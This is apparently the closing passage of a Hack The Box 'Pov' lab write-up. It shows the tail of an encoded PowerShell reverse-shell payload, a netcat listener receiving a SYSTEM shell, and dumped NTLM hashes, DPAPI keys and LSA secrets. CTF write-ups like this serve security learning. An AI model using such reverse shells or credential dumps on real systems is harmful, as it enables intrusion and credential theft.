pADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
┌──(root㉿kali)-[~/Desktop/htb/pov]
└─# rlwrap nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.10.14.87] from (UNKNOWN) [10.129.230.183] 49707
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
3. Hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::
sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::
alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0x2e477986f0cb591476d872caeb48052e3df5cf11
dpapi_userkey:0xf7d2eaaa2cb35427e1ff00730465bd2707c896b4
[*] NL$KM
0000 A2 1F 88 7C B1 5A C3 9A 91 08 6E 90 09 5A C7 B6 ...|.Z....n..Z..
0010 5B 2F 4A C7 0E 7C 56 E7 A5 51 2D CD C2 E0 2A 91 [/J..|V..Q-...*.
0020 DB AD 8F EB 4C EE DB 0E 12 36 30 0B D2 97 26 77 ....L....60...&w
0030 E1 26 EA 5E 2A A5 03 13 3C BE 1D D3 00 62 69 0E .&.^*...<....bi.
NL$KM:a21f887cb15ac39a91086e90095ac7b65b2f4ac70e7c56e7a5512dcdc2e02a91dbad8feb4ceedb0e1236300bd2972677e126ea5e2aa503133cbe1dd30062690e
[*] Cleaning up...